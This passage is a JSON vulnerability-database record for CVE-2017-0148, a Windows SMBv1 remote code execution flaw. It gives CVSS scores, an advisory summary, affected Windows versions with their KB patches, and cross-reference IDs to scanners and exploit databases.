"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service 